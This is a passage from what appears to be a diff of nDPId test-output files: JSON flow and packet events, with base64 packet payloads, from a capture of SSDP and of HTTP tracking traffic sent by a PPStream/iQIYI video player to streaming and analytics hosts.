zMDg1YS01Nzc2MDg0NC04YiBIVFRQLzEuMQ0KSG9zdDogMjIzLjI2LjEwNi42Ng0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogemgtY24NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEhDRE5DbGllbnRfV0lOUEM7bGliY3VybC83LjI2LjAgT3BlblNTTC8xLjAuMWcgemxpYi8xLjIuNTtRSy8xMC4wLjAuMjkzDQoNCg=="} +00971{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1467353159746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":443,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":443,"pkt_l4_len":409,"thread_ts_msec":1467353159746,"pkt":"ABxCjnAxTF4M6gNlCABFAAGtzXdAADgG9sXfGmpCwKhzCABQxT6QPm1nePNva1AYACEkXQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0NCkNvbnRlbnQtTGVuZ3RoOiA3Mg0KTGFzdC1Nb2RpZmllZDogU2F0LCAyNSBKdW4gMjAxNiAyMDo0Nzo0OCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkVUYWc6ICI1NzZlZWRmNC00OCINCkV4cGlyZXM6IFNhdCwgMDEgSnVsIDIwMTcgMDY6MDU6NTkgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQoBAAAAjem7lGlyqIWJ0WZ4YikhMAAAAADA8HoAAAAAAJ0fBgCdHwYAAAAgAABAAACfagIAEAAAABkBmvdUqrt6QK4cKbQBDrk="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1467353160157,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353160157,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClHaUAAAER5dDAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1091,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353160157,"flow_last_seen":1467353160157,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353160157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1467353163154,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1467353163154,"pkt":"AQBef\/\/6bEAIlAI6CABFAACljZ0AAAERddjAqAUw7\/\/\/+vm6B2wAkVW0TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165300,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGfJAAIAG0FjAqHMIymwO7MU\/AFBSz4AccUHHfVAYQTf+XQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjM6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTI3NTU4JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1ODg3NCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDcmc2g9JnNxPSZzdz0mdD1zcCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353165047&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1467353165410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353165410,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5NehAADMGBE7KbA7swKhzCABQxT9xQcd9Us+DmFAYACAMewAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA0IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAAUUGh1AAIAGeifAqHMIZePIC8VAAFBgEsEemWlGj1AQ\/\/DZSAAAR0VUIC90cmFjazI\/YT0wJmFzPTE7MiwzOzQsNSZiPTE0NjczNTMxNjUmYz05NjY1NDJjODJhNTY5NGQwZTk0M2Q1MGQ1ZmNmNWE1NSZjdj01LjIuMTUuMjI0MCZkPTUwMDAwMDA4NTQ5MzQmZHI9MjE3NSZmPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jmc9MF9hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZoPSZpPXFjXzEwMDAwMV8xMDAxNDAmaXY9MCZqPTMxJms9MTgwOTMyMzAxJmtwPTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4Jm49NDc5NTMxMDAwJm89MSZwPTEwMDAwMDAwMDAzODEmcT01MDAwMDAwOTIzNDQ3JnI9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImcnQ9MTQ2NzM1MzExMyZzPThlZGI2OTRjOGM4Y2NhOTIzZDNlYWU2NjIyZjlhZWU2JnN2PTQuMTAuMDA0JnU9MSZ1cD0mdj01MDAwMDAwODU0ODU4JnZlPTEmdz00LDUgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbn
Ryb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBhcGkuY3VwaWQuaXFpeWkuY29tDQpDb29raWU6IHBwc19jbGllbnRfdmVyMj01LjIuMTUuMjI0MDsgVDAwNDA0PTRlM2FlNDE1YTU4NDc0OGFjOWFhMzE2MjhmMzlkMWU4OyBfcHBzX2l2aT1WazQ5TVRZd05UQTFMYVcvcFBtaFJ6OC9QNlRhcEVlbXVEOC9wTSt3Wmo4dHBMV3gzemd3cGxvL3BHYW9jU1pXVUQweEpsWkRQVDgvUHo4K3BMV3gzemd3cGxvL3BHYW9jU1pXU2owdE1TWldVejFXSmxaRVBTWldWRnRCWFQweU1UYzFKbFpOUFNaV1ZqMDFMakl1TVRVdU1qSTBNQ1pXVlQxb2RIUndPaTh2ZDNkM0xtbHhhWGxwTG1OdmJTOTJYekU1Y25K"} -01396{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1110,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165456,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353165456,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/track2?a=0&as=1;2,3;4,5&b=1467353165&c=966542c82a5694d0e943d50d5fcf5a55&cv=5.2.15.2240&d=5000000854934&dr=2175&f=4e3ae415a584748ac9aa31628f39d1e8&g=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&h=&i=qc_100001_100140&iv=0&j=31&k=180932301&kp=4e3ae415a584748ac9aa31628f39d1e8&n=479531000&o=1&p=1000000000381&q=5000000923447&r=c4889e64ad9d9eeb9ff438910850c442&rt=1467353113&s=8edb694c8c8cca923d3eae6622f9aee6&sv=4.10.004&u=1&up=&v=5000000854858&ve=1&w=4,5","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; 
WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1467353165456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165456,"pkt":"TF4M6gNlABxCjnAxCABFAADjGh5AAIAGflfAqHMIZePIC8VAAFBgEsYKmWlGj1AY\/\/BFbwAAc2RuVjRiR2N1YUhSdGJBPT07IFFDMDA2PXU1NDl2cHoxMGw5ZmthdHVtNGFsdzRicDsgUUMwMDg9MTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE0NjY2NDU4MTYuMTsgSG1fbHZ0XzUzYjczNzRhNjNjMzc0ODNlNWRkOTdkNzhkOWJiMzZlPTE0NjY2NDU4MTc7IFFDMDA1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQoNCg=="} -00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1467353165492,"pkt":"ABxCjnAxTF4M6gNlCABFAAEkdU5AAC8Gc+Zl48gLwKhzCABQxUCZaUaPYBLGxVAYP\/ygXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAyDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCm9r"} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01721{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1004,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1004,"pkt_l4_len":970,"thread_ts_msec":1467353165563,"pkt":"TF4M6gNlABxCjnAxCABFAAPeGjdAAIAGvYPAqHMIe31wMcVBAFAj7VXd5qVx9VAYQTcqlQAAR0VUIC9ta3QuZ2lmP2FpPTg0NTI4OTE5MDBjOTAzYWU3YTg3NjQ0NzkyM2E1YWVjJmV0PTAgSFRUUC8xLjENCkFjY2VwdC1MYW5ndWFnZTogemgtQ04NClJlZmVyZXI6IGh0dHA6Ly93d3cuaXFpeWkuY29tL2NvbW1vbi9mbGFzaHBsYXllci8yMDE0MDkyNC9NYWluUGxheWVyXzVfMl8zX2MzXzJfMV82LnN3Zg0KcXlpZDogYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOiBfMjAxMg0KcXlwbGF0Zm9ybTogMC0yDQp4LWZsYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEhfTUtUX0NMS0lEPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4Nj
UzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmNzU3NDc1MmU2MjY1OyBIX01LVF9DTEtMT0c9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} -00989{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1113,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165563,"flow_last_seen":1467353165563,"flow_idle_time":7440000,"flow_min_l4_payload_len":950,"flow_max_l4_payload_len":950,"flow_tot_l4_payload_len":950,"flow_avg_l4_payload_len":950,"midstream":1,"thread_ts_msec":1467353165563,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50497,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/mkt.gif?ai=8452891900c903ae7a876447923a5aec&et=0","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1467353165612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1467353165612,"pkt":"ABxCjnAxTF4M6gNlCABFAADj3khAAC0GT217fXAxwKhzCABQxUHmpXH1I+1Zk1AYAIIWkgAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvZ2lmDQpDYWNoZS1Db250cm9sOiBwcml2YXRlLCBtYXgtYWdlPTAsIG5vLWNhY2hlDQpQcmFnbWE6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjowNSBHTVQNClNlcnZlcjogYXBhY2hlDQoNCg=="} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1467353165616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353165616,"pkt":"TF4M6gNlABxCjnAxCABFAAOkGkVAAIAG0AXAqHMIymwO7MU\/AFBSz4OYcUHIDlAYQRL3fAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNjUwNDkmc2g9JnNxPSZzdz0mdD1zdCZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpD
YWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"pps.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1467353165659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1467353165659,"pkt":"ABxCjnAxTF4M6gNlCABFAAAo3kpAAC0GUCZ7fXAxwKhzCABQxUHmpXKwI+1ZlFARAILziAAAAAAAAAAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353165300,"flow_last_seen":1467353165300,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353165300,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
